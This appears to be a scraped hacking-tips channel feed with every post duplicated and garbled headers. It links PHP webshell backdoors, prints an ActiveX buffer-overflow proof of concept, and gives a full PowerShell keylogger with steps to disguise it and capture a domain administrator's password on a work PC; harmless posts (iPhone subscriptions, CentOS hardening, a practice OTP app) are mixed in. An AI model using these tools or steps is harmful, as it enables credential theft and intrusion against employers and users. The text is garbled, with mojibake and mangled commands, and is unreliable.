β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PHP backdoors shells new:
[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)
B374K Shell
[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)
R57 Shell
[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)
0byt3m1n1 Shell
[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)
AK-47 Shell
[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)
Marion001 Shell
[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)
p0wny-shell
[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)
Webadmin Shell
[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)
LazyShell
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PHP backdoors shells new:
[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)
B374K Shell
[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)
R57 Shell
[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)
0byt3m1n1 Shell
[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)
AK-47 Shell
[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)
Marion001 Shell
[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)
p0wny-shell
[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)
Webadmin Shell
[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)
LazyShell
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
shell-backdoor-list/shell/php/simple-shell.php at master Β· backdoorhub/shell-backdoor-list
π― PHP / ASP - Shell Backdoor List π―. Contribute to backdoorhub/shell-backdoor-list development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to create a hidden folder with password in Win system:
1) First create a folder and name it "hidden files";
2) Then open the folder, then right-click the mouse in the blank area of ββthe window and select the "New β Text Document" command to create a text file;
3) Copy the following code into the newly created text file:
@ECHO OFF
γγtitle Folder Private
γγif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
γγif NOT EXIST Private goto MDLOCKER
γγ:CONFIRM
γγecho Are you sure you want to lock the folder(Y/N)
γγset/p "cho=>"
γγif %cho%==Y goto LOCK
γγif %cho%==y goto LOCK
γγif %cho%==n goto END
γγif %cho%==N goto END
γγecho Invalid choice.
γγgoto CONFIRM
γγ:LOCK
γγren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
γγattrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
γγecho Folder locked
γγgoto End
γγ:UNLOCK
γγecho Enter password to unlock folder
γγset/p "pass=>"
γγif NOT %pass%== PASSWORD_GOES_HERE goto FAIL
γγattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
γγren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
γγecho Folder Unlocked successfully
γγgoto End
γγ:FAIL
γγecho Invalid password
γγgoto end
γγ:MDLOCKER
γγmd Private
γγecho Private created successfully
γγgoto End
γγ:End
4) replace "PASSWORD_GOES_HERE" with the password you want, such as: 12345, the final effect is: if NOT %pass%== 12345 goto FAIL;
5) Then save the text file as .bat format, the file name can be set to "locker.bat", reminder, set the save type to "all files" to save successfully;
6) Double-click the "Locker.bat" file again to make the contents of the "Private" folder disappear. Enter "Y" in the command prompt window that appears and press Enter; at this time, we found that the folder is hidden
@UndercodeTesting
don't clone our tips:)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to create a hidden folder with password in Win system:
1) First create a folder and name it "hidden files";
2) Then open the folder, then right-click the mouse in the blank area of ββthe window and select the "New β Text Document" command to create a text file;
3) Copy the following code into the newly created text file:
@ECHO OFF
γγtitle Folder Private
γγif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
γγif NOT EXIST Private goto MDLOCKER
γγ:CONFIRM
γγecho Are you sure you want to lock the folder(Y/N)
γγset/p "cho=>"
γγif %cho%==Y goto LOCK
γγif %cho%==y goto LOCK
γγif %cho%==n goto END
γγif %cho%==N goto END
γγecho Invalid choice.
γγgoto CONFIRM
γγ:LOCK
γγren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
γγattrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
γγecho Folder locked
γγgoto End
γγ:UNLOCK
γγecho Enter password to unlock folder
γγset/p "pass=>"
γγif NOT %pass%== PASSWORD_GOES_HERE goto FAIL
γγattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
γγren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
γγecho Folder Unlocked successfully
γγgoto End
γγ:FAIL
γγecho Invalid password
γγgoto end
γγ:MDLOCKER
γγmd Private
γγecho Private created successfully
γγgoto End
γγ:End
4) replace "PASSWORD_GOES_HERE" with the password you want, such as: 12345, the final effect is: if NOT %pass%== 12345 goto FAIL;
5) Then save the text file as .bat format, the file name can be set to "locker.bat", reminder, set the save type to "all files" to save successfully;
6) Double-click the "Locker.bat" file again to make the contents of the "Private" folder disappear. Enter "Y" in the command prompt window that appears and press Enter; at this time, we found that the folder is hidden
@UndercodeTesting
don't clone our tips:)
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC for 2008-2012 versions:
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}
document.write(body buf body1);
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC for 2008-2012 versions:
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}
document.write(body buf body1);
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π App security tips for mobile, web, and desktop apps :
1) Make sure your application has no vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.
Make sure there are no known vulnerabilities in your application.
It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.
2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.
Security testing doesn't slow down the development process.
Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.
Therefore, consider checking the security of your applications before going into production.
3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.
This program allows your organization to find and fix bugs before they become known to the public or known hackers.
This way you can prevent incidents.
4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.
Knowledge of cybersecurity can help your organization counter the threats of your applications.
5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.
Consider using an automated scanner to scan that will run tests daily.
You can also use vulnerability scanning tools that are automated.
Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.
6) Think Before Using Open Source In Your Application
open source can be vulnerable.
Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.
So think twice before using open source in your application.
Riskemy.com says, "Just one line of broken code can destroy an entire site."
7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.
8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.
Penetration testing is useful for protecting cybercriminal applications.
Penetration testing is the practice of discovering vulnerabilities in a computer system, network, or web application that an attacker could exploit.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π App security tips for mobile, web, and desktop apps :
1) Make sure your application has no vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.
Make sure there are no known vulnerabilities in your application.
It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.
2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.
Security testing doesn't slow down the development process.
Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.
Therefore, consider checking the security of your applications before going into production.
3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.
This program allows your organization to find and fix bugs before they become known to the public or known hackers.
This way you can prevent incidents.
4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.
Knowledge of cybersecurity can help your organization counter the threats of your applications.
5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.
Consider using an automated scanner to scan that will run tests daily.
You can also use vulnerability scanning tools that are automated.
Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.
6) Think Before Using Open Source In Your Application
open source can be vulnerable.
Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.
So think twice before using open source in your application.
Riskemy.com says, "Just one line of broken code can destroy an entire site."
7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.
8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.
Penetration testing is useful for protecting cybercriminal applications.
Penetration testing is the practice of discovering vulnerabilities in a computer system, network, or web application that an attacker could exploit.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
New Samsung Vulnerability allows attackers to bypass authentication for a locked Gallery.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to check for unnecessary subscriptions on iPhone?
#FastTips
1) These days, one-time purchases of games, music, books, news, movies, and TV shows on mobile are being replaced by monthly subscriptions. It is enough to subscribe once and the funds will be automatically debited every month. There are free trial periods, to gain access to which you also need to subscribe to the service. After that, you can forget to unsubscribe if you don't want to pay. Or some don't know how to unsubscribe. We will tell you how to avoid such troubles.
2) There are several ways to check for subscriptions on iPhone, whether paid or free. Subscriptions made with your Apple ID account are verified. Services like Apple Arcade, Apple News +, Apple Music, Apple TV +, Apple TV, and third-party services appear in one place.
3) You can access the subscription management page from applications such as Books, Music, iTunes Store. The fastest way to do this is in system settings, App Store and TV apps.
Settings: Apple ID -> Subscriptions
Profile icon (in Today, Games, Apps and Arcade) -> subscriptions on the app Store
4) Settings (left), App Store (center), TV (right)
Once on the subscription page, you will see all subscriptions associated with your Apple ID account, active and expired. To cancel, click under the active ones, then click "Cancel free trial" or "Cancel subscription", then in the window click "Confirm".
5) Keep in mind that these are only Apple ID-related subscriptions. You may have others with other accounts that do not appear on this page. If you suspect the existence of such subscriptions, check the corresponding applications. Examples include subscriptions to GrubHub, DoorDash, Netflix, Hulu.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to check for unnecessary subscriptions on iPhone?
#FastTips
1) These days, one-time purchases of games, music, books, news, movies, and TV shows on mobile are being replaced by monthly subscriptions. It is enough to subscribe once and the funds will be automatically debited every month. There are free trial periods, to gain access to which you also need to subscribe to the service. After that, you can forget to unsubscribe if you don't want to pay. Or some don't know how to unsubscribe. We will tell you how to avoid such troubles.
2) There are several ways to check for subscriptions on iPhone, whether paid or free. Subscriptions made with your Apple ID account are verified. Services like Apple Arcade, Apple News +, Apple Music, Apple TV +, Apple TV, and third-party services appear in one place.
3) You can access the subscription management page from applications such as Books, Music, iTunes Store. The fastest way to do this is in system settings, App Store and TV apps.
Settings: Apple ID -> Subscriptions
Profile icon (in Today, Games, Apps and Arcade) -> subscriptions on the app Store
4) Settings (left), App Store (center), TV (right)
Once on the subscription page, you will see all subscriptions associated with your Apple ID account, active and expired. To cancel, click under the active ones, then click "Cancel free trial" or "Cancel subscription", then in the window click "Confirm".
5) Keep in mind that these are only Apple ID-related subscriptions. You may have others with other accounts that do not appear on this page. If you suspect the existence of such subscriptions, check the corresponding applications. Examples include subscriptions to GrubHub, DoorDash, Netflix, Hulu.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦βοΈHow to get an admin password on a work PC in an Active Directory domain?
A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.
B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.
c) Then open Windows PowerShell ISE and copy the keylogger script code:
#requires -Version 2
function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")
{
# Signatures for API Calls
$ signatures = @ '
[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
public static extern short GetAsyncKeyState (int virtualKeyCode);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int GetKeyboardState (byte [] keystate);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int MapVirtualKey (uint uCode, int uMapType);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# load signatures and make members available
$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru
# create output file
$ null = New-Item -Path $ Path -ItemType File -Force
try
{
Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red
# create endless loop. When user presses CTRL + C, finally-block
# executes and shows the collected key presses
while ($ true) {
Start-Sleep -Milliseconds 40
# scan all ASCII codes above 8
for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {
# get current key state
$ state = $ API :: GetAsyncKeyState ($ ascii)
# is key pressed?
if ($ state -eq -32767) {
$ null = [console] :: CapsLock
# translate scan code to real code
$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)
# get keyboard state for virtual keys
$ kbstate = New-Object Byte [] 256
$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)
# prepare a StringBuilder to receive input key
$ mychar = New-Object -TypeName System.Text.StringBuilder
# translate virtual key
$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)
if ($ success)
{
# add key to logger file
[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)
}
}
}
}
}
finally
{
# open logger file in Notepad
notepad $ Path
}
}
# records all key presses until script is aborted by pressing CTRL + C
# will then open the file with collected key codes
π¦Start-KeyLogger
Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦βοΈHow to get an admin password on a work PC in an Active Directory domain?
A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.
B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.
c) Then open Windows PowerShell ISE and copy the keylogger script code:
#requires -Version 2
function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")
{
# Signatures for API Calls
$ signatures = @ '
[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
public static extern short GetAsyncKeyState (int virtualKeyCode);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int GetKeyboardState (byte [] keystate);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int MapVirtualKey (uint uCode, int uMapType);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# load signatures and make members available
$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru
# create output file
$ null = New-Item -Path $ Path -ItemType File -Force
try
{
Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red
# create endless loop. When user presses CTRL + C, finally-block
# executes and shows the collected key presses
while ($ true) {
Start-Sleep -Milliseconds 40
# scan all ASCII codes above 8
for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {
# get current key state
$ state = $ API :: GetAsyncKeyState ($ ascii)
# is key pressed?
if ($ state -eq -32767) {
$ null = [console] :: CapsLock
# translate scan code to real code
$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)
# get keyboard state for virtual keys
$ kbstate = New-Object Byte [] 256
$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)
# prepare a StringBuilder to receive input key
$ mychar = New-Object -TypeName System.Text.StringBuilder
# translate virtual key
$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)
if ($ success)
{
# add key to logger file
[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)
}
}
}
}
}
finally
{
# open logger file in Notepad
notepad $ Path
}
}
# records all key presses until script is aborted by pressing CTRL + C
# will then open the file with collected key codes
π¦Start-KeyLogger
Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦the content that sniffer cares about can be divided into the following categories:
1) Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may cause the intruder to work out your algorithm while eating skewers at home.
2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent on the Internet.
3) keeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4) Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection. This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a later article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffers)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦the content that sniffer cares about can be divided into the following categories:
1) Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may cause the intruder to work out your algorithm while eating skewers at home.
2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent on the Internet.
3) keeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4) Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection. This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a later article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffers)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
InfoZip UnZip 6.00 and 6.1c22 Buffer Overflow .pdf
1.6 MB
Real Methode :
InfoZip UnZip 6.00 / 6.1c22 Buer Overow
InfoZip UnZip 6.00 / 6.1c22 Buer Overow
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ CentOS Server Security Tips :
A) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
B) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
22. Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
C) Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
D) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
Run the command below to display writable files other than symbolic links, which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
E) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you are entering a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
To force users to use a password of at least 8 characters, including all character classes, sequential character checking, add the following lines to /etc/security/pwquality.conf:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
F) Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
G) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ CentOS Server Security Tips :
A) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
B) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
22. Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
C) Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
D) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
Run the command below to display writable files other than symbolic links, which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
E) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you are entering a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
To force users to use a password of at least 8 characters, including all character classes, sequential character checking, add the following lines to /etc/security/pwquality.conf:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
F) Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
G) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦OTP BYPASS :
Vulnerable OTP Application created using PHP & Google OTP/Updated!
You will need
1. Web Server (Apache recommended)
2. PHP 7 and above
3. Mysql or MariaDB
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) get https://github.com/mddanish/Vulnerable-OTP-Application
2) A step by step series of examples that tell you have to get the application running
After installing Apache, PHP 7 and MariaDB, which I think that you know how to install, or else google about it.
3) Setting up Application database.
Run SQL File vuln_otp.sql against MariaDB to create necessary Database, Table and Columns
4) Adding Database details to application
Edit config > db_connection.php and details of Database connections details (Hostname, Username, Password, Database Name)
5) Open the Application in browser and have fun.
Running the tests
You can use Burp suite or Browser web developer mode to bypass OTP login. Remember to Register a test user before Bypassing it, and use Google Authenticator for OTP
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦OTP BYPASS :
Vulnerable OTP Application created using PHP & Google OTP/Updated!
You will need
1. Web Server (Apache recommended)
2. PHP 7 and above
3. Mysql or MariaDB
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) get https://github.com/mddanish/Vulnerable-OTP-Application
2) A step by step series of examples that tell you have to get the application running
After installing Apache, PHP 7 and MariaDB, which I think that you know how to install, or else google about it.
3) Setting up Application database.
Run SQL File vuln_otp.sql against MariaDB to create necessary Database, Table and Columns
4) Adding Database details to application
Edit config > db_connection.php and details of Database connections details (Hostname, Username, Password, Database Name)
5) Open the Application in browser and have fun.
Running the tests
You can use Burp suite or Browser web developer mode to bypass OTP login. Remember to Register a test user before Bypassing it, and use Google Authenticator for OTP
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mddanish/Vulnerable-OTP-Application: Vulnerable OTP/2FA Application written in PHP using Google Authenticator
Vulnerable OTP/2FA Application written in PHP using Google Authenticator - mddanish/Vulnerable-OTP-Application
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected...How to transfer data in HTTP header ?
The HTTP headers can be manipulated with the cURL program , which has the -H 'HEADER: VALUE' option .
A) For example, if we want to pass to the localhost / headers.php page a header named β undercode β with the value β Hello! How are you? ", Then just run the following command:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
I'll show an example of exchanging data with a local web server.
B) If you have Kali Linux (and any Debian derivatives in general), then to start the web server run:
sudo systemctl start apache2.service
C) If you have Arch Linux / BlackArch, then to start the web server run:
sudo systemctl start httpd.service
Now create a headers.php file . To do this in Kali Linux:
sudo gedit /var/www/html/headers.php
D) On Arch Linux / BlackArch:
sudo gedit /srv/http/headers.php
And copy the following into it:
<?php
$headers = apache_request_headers();
if (isset($headers["undercode"])) {
echo $headers["undercode"];
}
E) That is, the script simply outputs the value of the Hackware header (if received).
If you open http: //localhost/headers.php in a web browser , a blank page will be displayed - nothing was received, and therefore nothing was displayed.
F) Let's run the command already discussed above, in which we pass the undercode header:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Undetected...How to transfer data in HTTP header ?
The HTTP headers can be manipulated with the cURL program , which has the -H 'HEADER: VALUE' option .
A) For example, if we want to pass to the localhost / headers.php page a header named β undercode β with the value β Hello! How are you? ", Then just run the following command:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
I'll show an example of exchanging data with a local web server.
B) If you have Kali Linux (and any Debian derivatives in general), then to start the web server run:
sudo systemctl start apache2.service
C) If you have Arch Linux / BlackArch, then to start the web server run:
sudo systemctl start httpd.service
Now create a headers.php file . To do this in Kali Linux:
sudo gedit /var/www/html/headers.php
D) On Arch Linux / BlackArch:
sudo gedit /srv/http/headers.php
And copy the following into it:
<?php
$headers = apache_request_headers();
if (isset($headers["undercode"])) {
echo $headers["undercode"];
}
E) That is, the script simply outputs the value of the Hackware header (if received).
If you open http: //localhost/headers.php in a web browser , a blank page will be displayed - nothing was received, and therefore nothing was displayed.
F) Let's run the command already discussed above, in which we pass the undercode header:
curl -H 'undercode: Hello! How are you?' localhost/headers.php
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Detailed introduction and usage of lcx port forwarding (lcx intranet forwarding posture):
A) Let's first explain in detail the LXC forwarding tools and usage methods:
lcx.exe is a port forwarding tool, which is equivalent to forwarding port 3389 on broiler A to machine B.
